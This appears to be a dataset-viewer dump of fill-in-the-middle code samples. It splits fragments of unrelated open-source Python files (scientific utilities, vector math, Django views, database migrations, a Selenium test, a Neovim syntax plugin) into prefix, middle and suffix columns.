prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
"""Command line interface for echo server.""" import fnmatch import asyncio import argparse from aioconsole import AsynchronousCli, start_interactive_server from aioconsole.server import parse_server, print_server from . import echo async def get_history(reader, writer, pattern=None): history = asyncio.get_event_loop().history if not history: return "No message in the history" if pattern: history = {host: history[host] for host in fnmatch.filter(history, pattern)} if not history: return "No host match the given pattern" for host in history: writer.write(f"Host {host}:\n".encode()) for i, message in enumerate(history[host]): writer.write(f" {i}. {message}\n".encode()) def make_cli(streams=None): parser = argparse.ArgumentParser(description="Display the message history") parser.add_argument("--pattern", "-p", type=str, help="pattern to filter hostnames") commands = {"history": (get_history, parser)} return AsynchronousCli(commands, streams, prog="echo") def parse_args(args=None): parser = argparse.ArgumentParser( description="Run the echo server and a command line interface." ) parser.add_argument( "server", metavar="[HOST:]PORT", type=str, help="interface for the echo server, default host is localhost", ) parser.add_argument( "--serve-cli", metavar="[HOST:]PORT", type=str, help="serve the command line interface on the given host+port " "instead of using the standard streams", ) namespace = parser.parse_args(args) host, port = parse_server(namespace.server, parser) if namespace.serve_cli is not None: serve_cli = parse_server(namespace.serve_cli, parser) else:
serve_cli = None return host, port, serve_cli def main(args=None): host, port, serve_cli = parse_args(args) if serve_cli: cli_host, cli_port = serve_cli coro = start_interactive_server(make_cli, cli_host, cli_port) server = asyncio.get_event_loop().run_until_complete(coro) print_server(server, "command line interface") else: asyncio.ensure_future(make_cli().interact
()) return echo.run(host, port) if __name__ == "__main__": main()
U Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License along # with Psi4; if not, write to the Free Software Found
ation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # @END LICENSE # """Module with utility functions that act on molecule objects.""" from typing import Dict, Tuple, Union import numpy as np import qcelemental as qcel from psi4 import core from psi4.driver.p4util import temp_circular_import_blocker from psi4.driver import qcdb from psi4.driver.p4util.exce
ptions import * def molecule_set_attr(self, name, value): """Function to redefine __setattr__ method of molecule class.""" fxn = object.__getattribute__(self, "is_variable") isvar = fxn(name) if isvar: fxn = object.__getattribute__(self, "set_variable") fxn(name, value) return object.__setattr__(self, name, value) def molecule_get_attr(self, name): """Function to redefine __getattr__ method of molecule class.""" fxn = object.__getattribute__(self, "is_variable") isvar = fxn(name) if isvar: fxn = object.__getattribute__(self, "get_variable") return fxn(name) return object.__getattribute__(self, name) @classmethod def _molecule_from_string(cls, molstr, dtype=None, name=None, fix_com=None, fix_orientation=None, fix_symmetry=None, return_dict=False, enable_qm=True, enable_efp=True, missing_enabled_return_qm='none', missing_enabled_return_efp='none', verbose=1): molrec = qcel.molparse.from_string( molstr=molstr, dtype=dtype, name=name, fix_com=fix_com, fix_orientation=fix_orientation, fix_symmetry=fix_symmetry, return_processed=False, enable_qm=enable_qm, enable_efp=enable_efp, missing_enabled_return_qm=missing_enabled_return_qm, missing_enabled_return_efp=missing_enabled_return_efp, verbose=verbose) if return_dict: return core.Molecule.from_dict(molrec['qm']), molrec else: return core.Molecule.from_dict(molrec['qm']) @classmethod def _molecule_from_arrays(cls, geom=None, elea=None, elez=None, elem=None, mass=None, real=None, elbl=None, name=None, units='Angstrom', input_units_to_au=None, fix_com=None, fix_orientation=None, fix_symmetry=None, fragment_separators=None, fragment_charges=None, fragment_multiplicities=None, molecular_charge=None, molecular_multiplicity=None, comment=None, provenance=None, connectivity=None, missing_enabled_return='error', tooclose=0.1, zero_ghost_fragments=False, nonphysical=False, mtol=1.e-3, verbose=1, return_dict=False): """Construct Molecule from unvalidated arrays and variables. Light wrapper around :py:func:`~qcelemental.molparse.from_arrays` that is a full-featured constructor to dictionary representa- tion of Molecule. This follows one step further to return Molecule instance. Parameters ---------- See :py:func:`~qcelemental.molparse.from_arrays`. Returns ------- :py:class:`psi4.core.Molecule` """ molrec = qcel.molparse.from_arrays( geom=geom, elea=elea, elez=elez, elem=elem, mass=mass, real=real, elbl=elbl, name=name, units=units, input_units_to_au=input_units_to_au, fix_com=fix_com, fix_orientation=fix_orientation, fix_symmetry=fix_symmetry, fragment_separators=fragment_separators, fragment_charges=fragment_charges, fragment_multiplicities=fragment_multiplicities, molecular_charge=molecular_charge, molecular_multiplicity=molecular_multiplicity, comment=comment, provenance=provenance, connectivity=connectivity, domain='qm', missing_enabled_return=missing_enabled_return, tooclose=tooclose, zero_ghost_fragments=zero_ghost_fragments, nonphysical=nonphysical, mtol=mtol, verbose=verbose) if return_dict: return core.Molecule.from_dict(molrec), molrec else: return core.Molecule.from_dict(molrec) @classmethod def _molecule_from_schema(cls, molschema: Dict, return_dict: bool = False, nonphysical: bool = False, verbose: int = 1) -> Union[core.Molecule, Tuple[core.Molecule, Dict]]: """Construct Molecule from non-Psi4 schema. Light wrapper around :py:func:`~psi4.core.Molecule.from_arrays`. Parameters ---------- molschema Dictionary form of Molecule following known schema. return_dict Additionally return Molecule dictionary intermediate. nonphysical Do allow masses outside an element's natural range to pass validation? verbose Amount of printing. Returns ------- mol : :py:class:`psi4.core.Molecule` molrec : dict Dictionary representation of instance. Only provided if `return_dict` is True. """ molrec = qcel.molparse.from_schema(molschema, nonphysical=nonphysical, verbose=verbose) qmol = core.Molecule.from_dict(molrec) geom = np.array(molrec["geom"]).reshape((-1, 3)) qmol._initial_cartesian = core.Matrix.from_array(geom) if return_dict: return qmol, molrec else: return qmol def dynamic_variable_bind(cls): """Function to dynamically add extra members to the core.Molecule class. """ cls.__setattr__ = molecule_set_attr cls.__getattr__ = molecule_get_attr cls.to_arrays = qcdb.Molecule.to_arrays cls.to_dict = qcdb.Molecule.to_dict cls.BFS = qcdb.Molecule.BFS cls.B787 = qcdb.Molecule.B787 cls.scramble = qcdb.Molecule.scramble cls.from_arrays = _molecule_from_arrays cls.from_string = _molecule_from_string cls.to_string = qcdb.Molecule.to_string cls.from_schema = _molecule_from_schema cls.to_schema = qcdb.Molecule.to_schema cls.run_dftd3 = qcdb.Molecule.run_dftd3 cls.run_dftd4 = qcdb.Molecule.run_dftd4 cls.run_gcp = qcdb.Molecule.run_gcp cls.format_molecule_for_mol = qcdb.Molecule.format_molecule_for_mol dynamic_variable_bind(core.Molecule) # pass class type, not class instance # # Define geometry to be used by PSI4. # The molecule created by this will be set in options. # # geometry(" # O 1.0 0.0 0.0 # H 0.0 1.0 0.0 # H 0.0 0.0 0.0 # def geometry(geom, name="default"): """Function to create a molecule object of name *name* from the geometry in string *geom*. Permitted for user use but deprecated in driver in favor of explicit molecule-passing. Comments within the string are filtered. """ molrec = qcel.molparse.from_string( geom, enable_qm=True, missing_enabled_return_qm='minimal', enable_efp=True, missing_enabled_return_efp='none') molecule = core.Molecule.from_dict(molrec['qm']) if "geom" in molrec["qm"]: geom = np.array(molrec["qm"]["geom"]).reshape((-1, 3)) if molrec["qm"]["units"] == "Angstrom": geom = geom / qcel.constants.bohr2angstroms molecule._initial_cartesian = core.Matrix.from_array(geom) molecule.set_name(name) if 'efp' in mol
: return Vector3(self.x + v.x, self.y + v.y, self.z + v.z) __radd__ = __add__ def __sub__(self, v): return Vector3(self.x - v.x, self.y - v.y, self.z - v.z) def __neg__(self): return Vector3(-self.x, -self.y, -self.z) def __rsub__(self, v): return Vector3(v.x - self.x, v.y - self.y, v.z - self.z) def __mul__(self, v): if isinstance(v, Vector3): '''dot product''' return self.x*v.x + self.y*v.y + self.z*v.z return Vector3(self.x * v, self.y * v, self.z * v) __rmul__ = __mul__ def __div__(self, v): return Vector3(self.x / v, self.y / v, self.z / v) def __mod__(self, v): '''cross product''' return Vector3(self.y*v.z - self.z*v.y, self.z*v.x - self.x*v.z, self.x*v.y - self.y*v.x) def __copy__(self): return Vector3(self.x, self.y, self.z) copy = __copy__ def length(self): return sqrt(self.x**2 + self.y**2 + self.z**2) def zero(self): self.x = self.y = self.z = 0 def angle(self, v): '''return the angle between this vector and another vector''' return acos((self * v) / (self.length() * v.length())) def normalized(self): return self.__div__(self.length()) def normalize(self): v = self.normalized() self.x = v.x self.y = v.y self.z = v.z class Matrix3: '''a 3x3 matrix, intended as a rotation matrix''' def __init__(self, a=None, b=None, c=None): if a is not None and b is not None and c is not None: self.a = a.copy() self.b = b.copy() self.c = c.copy() else: self.identity() def __repr__(self): return 'Matrix3((%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f))' % ( self.a.x, self.a.y, self.a.z, self.b.x, self.b.y, self.b.z, self.c.x, self.c.y, self.c.z) def identity(self): self.a = Vector3(1,0,0) self.b = Vector3(0,1,0) self.c = Vector3(0,0,1) def transposed(self): return Matrix3(Vector3(self.a.x, self.b.x, self.c.x), Vector3(self.a.y, self.b.y, self.c.y), Vector3(self.a.z, self.b.z, self.c.z)) def from_euler(self, roll, pitch, yaw): '''fill the matrix from Euler angles in radians''' cp = cos(pitch) sp = sin(pitch) sr = sin(roll) cr = cos(roll) sy = sin(yaw) cy = cos(yaw) self.a.x = cp * cy self.a.y = (sr * sp * cy) - (cr * sy) self.a.z = (cr * sp * cy) + (sr * sy) self.b.x = cp * sy self.b.y = (sr * sp * sy) + (cr * cy) self.b.z = (cr * sp * sy) - (sr * cy) self.c.x = -sp self.c.y = sr * cp self.c.z = cr * cp def to_euler(self): '''find Euler angles for the matrix''' if self.c.x >= 1.0: pitch = pi elif self.c.x <= -1.0: pitch = -pi else: pitch = -asin(self.c.x) roll = atan2(self.c.y, self.c.z) yaw = atan2(self.b.x, self.a.x) return (roll, pitch, yaw) def __add__(self, m): return Matrix3(self.a + m.a, self.b + m.b, self.c + m.c) __radd__ = __add__ def __sub__(self, m): return Matrix3(self.a - m.a, self.b - m.b, self.c - m.c) def __rsub__(self, m): return Matrix3(m.a - self.a, m.b - self.b, m.c - self.c) def __mul__(self, other): if isinstance(other, Vector3): v = other return Vector3(self.a.x * v.x + self.a.y * v.y + self.a.z * v.z, self.b.x * v.x + self.b.y * v.y + self.b.z * v.z, self.c.x * v.x + self.c.y * v.y + self.c.z * v.z) elif isinstance(other, Matrix3): m = other return Matrix3(Vector3(self.a.x * m.a.x + self.a.y * m.b.x + self.a.z * m.c.x, self.a.x * m.a.y + self.a.y * m.b.y + self.a.z * m.c.y, self.a.x * m.a.z + self.a.y * m.b.z + self.a.z * m.c.z), Vector3(self.b.x * m.a.x + self.b.y * m.b.x + self.b.z * m.c.x, self.b.x * m.a.y + self.b.y * m.b.y + self.b.z * m.c.y, self.b.x * m.a.z + self.b.y * m.b.z + self.b.z * m.c.z), Vector3(self.c.x * m.a.x + self.c.y * m.b.x + self.c.z * m.c.x, self.c.x * m.a.y + self.c.y * m.b.y + self.c.z * m.c.y, self.c.x * m.a.z + self.c.y * m.b.z + self.c.z * m.c.z)) v = other return Matrix3(self.a * v, self.b * v, self.c * v) def __div__(self, v): return Matrix3(self.a / v, self.b / v, self.c / v) def __neg__(self): return Matrix3(-self.a, -self.b, -self.c) def __copy__(self): return Matrix3(self.a, self.b, self.c) copy = __copy__ def rotate(self, g): '''rotate the matrix by a given amount on 3 axes''' temp_matrix = Matrix3() a = self.a b = self.b c = self.c temp_matrix.a.x = a.y * g.z - a.z * g.y temp_matrix.a.y = a.z * g.x - a.x * g.z temp_matrix.a.z = a.x * g.y - a.y * g.x temp_matrix.b.x = b.y * g.z - b.z * g.y temp_matrix.b.y = b.z * g.x - b.x * g.z temp_matrix.b.z = b.x * g.y - b.y * g.x temp_matrix.c.x = c.y * g.z - c.z * g.y temp_matrix.c.y = c.z
* g.x - c.x * g.z temp_matrix.c.z = c.x * g.y - c.y * g.x self.a += temp_matrix.a self.b += temp_matrix.b self.c += temp_matrix.c def normalize(self): '''re-normalise a rotation matrix''' error = self.a * self.b t0 = self.a - (self.b * (0.5 * error)) t1 = self.b - (self.a * (0.5 * error)) t2 = t0 % t1 self.a = t0
* (1.0 / t0.length()) self.b = t1 * (1.0 / t1.length()) self.c = t2 * (1.0 / t2.length()) def trace(self): '''the trace of the matrix''' return self.a.x + self.b.y + self.c.z def from_axis_angle(self, axis, angle): '''create a rotation matrix from axis and angle''' ux = axis.x uy = axis.y uz = axis.z ct = cos(angle) st = sin(angle) self.a.x = ct + (1-ct) * ux**2 self.a.y = ux*uy*(1-ct) - uz*st self.a.z = ux*uz*(1-ct) + uy*st self.b.x = uy*ux*(1-ct) + uz*st self.b.y = ct + (1-ct) * uy**2 self.b.z = uy*uz*(1-ct) - ux*st self.c.x = uz*ux*(1-ct) - uy*st self.c.y = uz*uy*(1-ct) + ux*st self.c.z = ct + (1-ct) * uz**2 def from_two_vectors(self, vec1, vec2): '''get a rotation matrix from two vectors. This returns a rotation matrix which when applied to vec1 will produce a vector pointing in the same direction as vec2''' angle = vec1.angle(vec2) cross = vec1 % vec2 if cross.length() == 0: # the two vectors are colinear return self.from_euler(0,0,angle) cross.normalize() return self.from_axis_angle(cross, angle) class Plane: '''a plane in 3 space, defined by a point and a vector normal''' def __init__(self, point=None, normal=None): if point is None: point = Vector3(0,0,0) if normal is None: normal = Vector3(0, 0, 1) self.point = point self.normal = normal class Line: '''a line in 3 space, defined by a point and a vector''' def __init__(self, point=None, vector=None): if point is None: point = Vector3(0,0,0) if vector is None: vector = Vector3(0, 0, 1) self.point = point self.vector = vector def plane
# -*- coding: utf-8 -*- ############################################################################### # # GetInstance # Retrieves information about the specified Instance. # # Python versions 2.6, 2.7, 3.x # # Copyright 2014, Temboo Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific # language governing permissions and limitations under the License. # # ############################################################################### from temboo.core.choreography import Choreogr
aphy from temboo.core.choreography import InputSet from temboo.core.choreography import ResultSet from temboo.core.choreography import Ch
oreographyExecution import json class GetInstance(Choreography): def __init__(self, temboo_session): """ Create a new instance of the GetInstance Choreo. A TembooSession object, containing a valid set of Temboo credentials, must be supplied. """ super(GetInstance, self).__init__(temboo_session, '/Library/Google/ComputeEngine/Instances/GetInstance') def new_input_set(self): return GetInstanceInputSet() def _make_result_set(self, result, path): return GetInstanceResultSet(result, path) def _make_execution(self, session, exec_id, path): return GetInstanceChoreographyExecution(session, exec_id, path) class GetInstanceInputSet(InputSet): """ An InputSet with methods appropriate for specifying the inputs to the GetInstance Choreo. The InputSet object is used to specify input parameters when executing this Choreo. """ def set_AccessToken(self, value): """ Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.) """ super(GetInstanceInputSet, self)._set_input('AccessToken', value) def set_ClientID(self, value): """ Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Google. Required unless providing a valid AccessToken.) """ super(GetInstanceInputSet, self)._set_input('ClientID', value) def set_ClientSecret(self, value): """ Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Google. Required unless providing a valid AccessToken.) """ super(GetInstanceInputSet, self)._set_input('ClientSecret', value) def set_Fields(self, value): """ Set the value of the Fields input for this Choreo. ((optional, string) Comma-seperated list of fields you want to include in the response.) """ super(GetInstanceInputSet, self)._set_input('Fields', value) def set_Instance(self, value): """ Set the value of the Instance input for this Choreo. ((required, string) The name of the instance to retrieve.) """ super(GetInstanceInputSet, self)._set_input('Instance', value) def set_Project(self, value): """ Set the value of the Project input for this Choreo. ((required, string) The ID of a Google Compute project.) """ super(GetInstanceInputSet, self)._set_input('Project', value) def set_RefreshToken(self, value): """ Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.) """ super(GetInstanceInputSet, self)._set_input('RefreshToken', value) def set_Zone(self, value): """ Set the value of the Zone input for this Choreo. ((required, string) The name of the zone associated with this request.) """ super(GetInstanceInputSet, self)._set_input('Zone', value) class GetInstanceResultSet(ResultSet): """ A ResultSet with methods tailored to the values returned by the GetInstance Choreo. The ResultSet object is used to retrieve the results of a Choreo execution. """ def getJSONFromString(self, str): return json.loads(str) def get_Response(self): """ Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Google.) """ return self._output.get('Response', None) def get_NewAccessToken(self): """ Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.) """ return self._output.get('NewAccessToken', None) class GetInstanceChoreographyExecution(ChoreographyExecution): def _make_result_set(self, response, path): return GetInstanceResultSet(response, path)
# -*- coding: utf-8 -*- # crunchyfrog - a database schema browser and query tool # Copyright (C) 2008 Andi Albrecht <albrecht.andi@gmail.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """Configuration""" import gobject from os.path import abspath, dirname, join from configobj import ConfigObj from gettext import gettext as _ import logging log = logging.getLogger("CONFIG") class Config(gobject.GObject): """Configuration object An instance of this class is accessible through the ``config`` attribute of an `CFApplication`_ instance. The Config class is a simplified wrapper around a ConfigObj instance. It merges a default configuration located as package data in this package with an user configuration. The ``-c`` command line switch determines which user configuration file is used. If it's not set, it defaults to ``~/.config/crunchyfrog/config``. This wrapper provides only a getter and a setter for configuration values and expects that option names are dotted strings (but only by convention). Values can be any basic Python types since it uses ConfigObj's ``unrepr`` mode (Read the `ConfigObj documentation`_ for details). Plugins can connect to the `changed` signal to track configuration changes, i.e. the SQL editor uses this signal to reflect changes made through the preference dialog. .. Note:: The runtime Config instance (``app.config``) is bound to the application. So it is not possible to store instance specific data here.
:Usage example: .. sourcecode:: python
>>> app.config.get("foo.bar") # Not set yet, None is default None >>> app.config.set("foo.bar", True) >>> app.config.get("foo.bar") True >>> app.config.set("foo.bar", ["Completely", "different"]) # No type check! >>> print " ".join(app.config.get("foo.bar")) Completely different :Signals: changed ``def callback(config, key, value, user_oaram1, ...)`` Emitted when a option has changed. .. _CFApplication: cf.app.CFApplication.html .. _ConfigObj documentation: http://www.voidspace.org.uk/python/configobj.html#unrepr-mode """ __gsignals__ = { "changed" : (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (str, gobject.TYPE_PYOBJECT)), } def __init__(self, app, config_file): """ The constructor of this class takes two arguments: :Parameter: app `CFApplication`_ instance config_file Path to user configuration file .. _CFApplication: cf.app.CFApplication.html """ self.app = app self.__gobject_init__() # IGNORE:E1101 self.__conf = None self.__config_file = config_file self.__init_conf() self.app.register_shutdown_task(self.on_app_shutdown, _(u"Writing configuration")) def on_app_shutdown(self, *args): # IGNORE:W0613 """Callback: write configuration file to disk""" self.write() def __init_conf(self): """Intialize the configuration system""" self.__conf = ConfigObj(abspath(join(dirname(__file__), "default.cfg")), unrepr=True) log.info("Loading configuration file %r" % self.__config_file) self.__conf.update(ConfigObj(self.__config_file, unrepr=True)) def init(self): """Loads configuration""" pass def get(self, key, default=None): """Returns value or default for key""" return self.__conf.get(key, default) def set(self, key, value): """Sets key to value""" self.__conf[key] = value self.emit("changed", key, value) # IGNORE:E1101 def write(self, fname=None): """Writes configuration file""" if not fname: fname = self.__config_file fp = open(fname, "w") self.__conf.write(fp) fp.close()
#!/usr/bin
/env python from __future__ import print_function import sys import numpy import pni.io.nx.h5 as nexus f = nexus.create_file("test_string2.nxs",True); d = f.root().create_group("scan_1","NXentry").\ create_group("detector","NXdetector") sa= d.create_field("ListofStrings","string",shape=(3,2)) sa[0,0]="safdfdsffdsfd" sa[1,0]="safdsfsfdsffdsfd" sa[2,0]="safdfsfd" print(sa[0,0]) print(sa[1,0]) print(sa[2,0]) print(sa[...]) f.close
()
"""Drafts as required folder Revision ID: 41a7e825d108 Revises: 269247bc37d3 Create Date: 2014-0
3-13 21:14:25.652333 """ # revision identifiers, used by Alembic. revision = '41a7e825d108' down_revision = '269247bc37d3' from alembic import op import sqlalchemy as sa def upgrade(): op.add_column('imapaccount', sa.Column('drafts_folder_name', sa.String(255),
nullable=True)) def downgrade(): op.drop_column('imapaccount', 'drafts_folder_name')
#!/usr/bin/python # # Copyright 2008-2010 WebDriver committers # Copyright 2008-2010 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you
may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See
the License for the specific language governing permissions and # limitations under the License. from selenium import webdriver from selenium.test.selenium.webdriver.common import api_examples from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer def setup_module(module): webserver = SimpleWebServer() webserver.start() FirefoxApiExampleTest.webserver = webserver FirefoxApiExampleTest.driver = webdriver.Firefox() class FirefoxApiExampleTest(api_examples.ApiExampleTest): pass def teardown_module(module): FirefoxApiExampleTest.driver.quit() FirefoxApiExampleTest.webserver.stop()
from application import app as application from gevent import monkey from socketio.server import SocketIOServer
monkey.patch_all() if __name__ == '__main__': # SocketIOServer( # ('', application.config['PORT']), # application, # resource="socket.io").serv
e_forever() socketio.run(application)
# browsershots.org - Test your web design in different browsers # Copyright (C) 2007 Johann C. Rocholl <johann@browsershots.org> # # Browsershots is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # Browsershots is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of
the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ URL configuration for the accounts app. """ __revision__ = "$Rev: 2160 $" __date__ = "$Date: 2007-09-18 19:12:50 -0400 (Tue, 18 Sep 2007) $" __author__ = "$Author: johann $" from django.conf.urls.defaults import patterns urlpatter
ns = patterns('shotserver04.accounts.views', (r'^login/$', 'login'), (r'^logout/$', 'logout'), (r'^profile/$', 'profile'), (r'^email/$', 'email'), (r'^verify/(?P<hashkey>[0-9a-f]{32})/$', 'verify'), )
from django.shortcuts import render, redirect, get_object_or_404 from django.core.urlresolvers import reverse from openiv.settings import * # Create your views here. def index(request): return redirect(reverse('public:event')) # Comment the above to have an independent home page. context = { 'imagesource': 'public/images/image-1.jpg', 'activetab': 'home', 'titletext': EVENT_MEDIUM_NAME, 'text1': [ 'The ' + EVENT_ANNIVERSARY + ' AIVCF will take place in ' + EVENT_CITY + ' in ' + EVENT_YEAR + '.', 'Out of courtesy to the upcoming festivals (68th in Perth 2017, 69th in Melbourne 2018), we won’t have any news until Melbourne 2018 has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.', ], } return render(request,'public/index.html', context) def event(request): context = { 'imagesource': 'public/images/image-1.jpg', 'activetab': 'event', 'titletext': 'About ' + EVENT_MEDIUM_NAME, 'text1': [ 'Intervarsity choral festivals (IVs) have been an annual event since 1950 when the Melbourne University Choral Society travelled to Sydney to present a combined concert with the Sydney University Musical Society. IVs quickly expanded to include other university choirs and are now hosted in many cities across Australia with participation drawing from the wider choral community in Australia and occasionally overseas.', EVENT_YEAR + ' sees the ' + EVENT_ANNIVERSARY + ' IV, hosted in ' + EVENT_CITY + '
by ' + EVENT_HOSTED_BY + '. Choristers from across the country will be in ' + EVENT_CITY + ' for intensive rehearsals to produce a grand concert.', 'Out
of courtesy to the upcoming festivals (' + EVENT_UPCOMING_EVENTS + '), we won’t have any news until ' + EVENT_PRIOR_CITY + ' ' + EVENT_PRIOR_YEAR + ' has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.', ORGANISATION_SHORT_NAME + ' acknowledges that ' + EVENT_SHORT_NAME + ' is being held on the traditional lands of the ' + EVENT_ABORIGINAL_COUNTRY + ' people; we pay respect to the elders of the community and extend our recognition to their descendants.', ], 'titletext2': 'Past ' + EVENT_CITY + ' IVs' } return render(request,'public/event.html', context) def organisation(request): context = { 'imagesource': 'public/images/image-1.jpg', 'activetab': 'organisation', 'titletext': ORGANISATION_SHORT_NAME, 'text1': [ 'The ' + EVENT_ANNIVERSARY + ' Australian Intervarsity Choral Festival is presented by ' + ORGANISATION_SHORT_NAME + ' in ' + EVENT_YEAR + '. The organisation was elected by the members of ' + EVENT_HOSTED_BY + '.', 'We represent the ' + EVENT_CITY + ' contingent of a wider choral community across Australia with combined membership of over a thousand nationally in the Australian Intervarsity Choral Societies Association (AICSA).', ] } return render(request,'public/index.html', context) def participate(request): context = { 'imagesource': 'public/images/image-2.jpg', 'activetab': 'participate', 'titletext': 'Participate', } return render(request,'public/participateindex.html', context) def participatefundraising(request): context = { 'imagesource': 'public/images/image-2.jpg', 'activetab': 'participate', 'titletext': 'Participate: Fundraising', } return render(request,'public/participatefundraisingindex.html', context) def help(request): context = { 'titletext': 'Help', } return render(request,'public/help.html', context) def privacy(request): context = { 'titletext': 'Privacy policy', } return render(request,'public/help.html', context) def privacyaffiliates(request): context = { 'titletext': 'Affiliates', } return render(request,'public/help.html', context) def conduct(request): context = { 'titletext': 'Code of conduct', } return render(request,'public/help.html', context)
ly wrong import pygments import pygments.lexers import pygments.token @neovim.plugin class Neosyntax(object): def __init__(self, nvim): self.nvim = nvim # swap src_ids. from brefdl: allocate two ids, and swap, adding before clearing, so things that don't change won't appear to flicker self.srcset = True self.pygmap = {} t = pygments.token self.pygmap[t.Comment.Hashbang] = "Comment" self.pygmap[t.Comment.Single] = "Comment" self.pygmap[t.Comment] = "Comment" # older versions of pygments don't have Single and Hashbang? self.pygmap[t.Keyword.Namespace] = "Include" self.pygmap[t.Keyword] = "Conditional" self.pygmap[t.Literal.Number.Integer] = "Number" self.pygmap[t.Literal.String.Double] = "String" self.pygmap[t.Literal.String.Single] = "String" self.pygmap[t.Literal.String] = "String" # same comment as above self.pygmap[t.Name.Builtin.Pseudo] = "Boolean" self.pygmap[t.Name.Builtin] = "Function" self.pygmap[t.Name.Decorator] = "PreProc" self.pygmap[t.Operator.Word] = "Conditional" def msg(self, m): self.nvim.command("echom '" + str(m) + "'") @neovim.autocmd('BufEnter', pattern='*', eval='expand("<abuf>")', sync=False) def autocmd_handler1(self, bufnr): # TODO how to pass in multiple arguments? self.highlight_buffer(int(bufnr)) @neovim.autocmd('TextChanged', pattern='*', eval='expand("<abuf>")', sync=False) def autocmd_handler2(self, bufnr): self.highlight_buffer(int(bufnr)) @neovim.autocmd('TextChangedI', pattern='*', eval='expand("<abuf>")', sync=False) def autocmd_handler3(self, bufnr): # TODO do special thing here if the user is currently typing inside a string or comment # to extend that highlight group a bunch of columns ahead # not sure where the best place to implement that will be # TODO I was hoping that performance with syntax highlighting being done by this autocmd # would be comparable to plain old :syntax off and without this plugin # I think it is better, although I'll have to find a way to test that empirically # But, it still isn't as good as I hoped. Some flickering is still present # This may be a limitation of the tui and its ability to process remote api calls # Maybe this will work better in the eventual gui? # If nothing else, this function gives the option to have syntax highlighting turned off during # insert mode, then handled once you leave insert mode. Just have to remove the TextChangedI autocmd # and keep the TextChanged one (no I). # This is less than ideal for lots of situations, but is better than nothing # TODO figure out a way to queue these calls somehow? with the swapping src_id strategy, # flicker is gone when typing fast in insert mode, but typing too fast can still cause a # call backlog that can either crash the python host or just appear as lots of lag to the user # a timer? when this is called, start a timer that counts down from X seconds # throw away and subsequent calls that come in before the tmier is up # maybe highlight_buffer should take lines as an argument to facilitate the viewport shit? self.highlight_buffer(int(bufnr)) @neovim.function('UnHighlightBuffer', sync=False) def unhighlight_buffer(self, bufnr): bufnr = int(bufnr) for b in self.nvim.buffers: if b.number == bufnr: # TODO what if it isn't found? buf = b break end = len([line for line in buf]) buf.clear_highlight(src_id=1, line_start=0, line_end=end, async=True) buf.clear_highlight(src_id=2, line_start=0, line_end=end, async=True) @neovim.function('HighlightBuffer', sync=False) def highlight_buffer(self, bufnr): # XXX some ideas to help with flickering: # use cursorholdi instead of textchangedi # still use textchangedi, but also use a timer, and if the highlight is less than X seconds old, don't recompute, just return # in insert mode, only recompute highlight groups on the line, or couple of lines surrounding the cursor # get the viewport of the current window, render that region only or first before the rest of the buffer # also, should cache a map of buffer -> lexer so this doesn't have to be done every time for b in self.nvim.buffers: if b.number == bufnr: # TODO what if it isn't found? buf = b break # TODO - can I be more intelligent than doing the whole buffer every time? just the area around a change? fullbuf = "\n".join([line for line in buf]) # TODO can i cache this somehow? self.msg(fullbuf) mylexer = pygments.lexers.guess_lexer(fullbuf) # TODO cache this # TODO these numbers need to be per buffer addid = 1 if self.srcset else 2 rmid = 2 if self.srcset else 1 self.srcset = not self.srcset arglist = [] linenum = 0 lastnewlineindex = -1 for (index, tokentype, value) in mylexer.get_tokens_unprocessed(fullbuf): self.msg("line: " + str(linenum)) self.msg("idx : " + str(index))
self.msg("lni : " + str(lastnewlineindex)) self.msg("tok : " + str(tokentype)) self.msg("val : " + str(value)) self.msg("--------") # XXX issue with highlight groups # if `:syntax off` is set from vimrc, which is the entire goal of this plugin # then a lot (maybe all) of the language specific highlight groups will never be loaded # e.g., the "Comment" hig
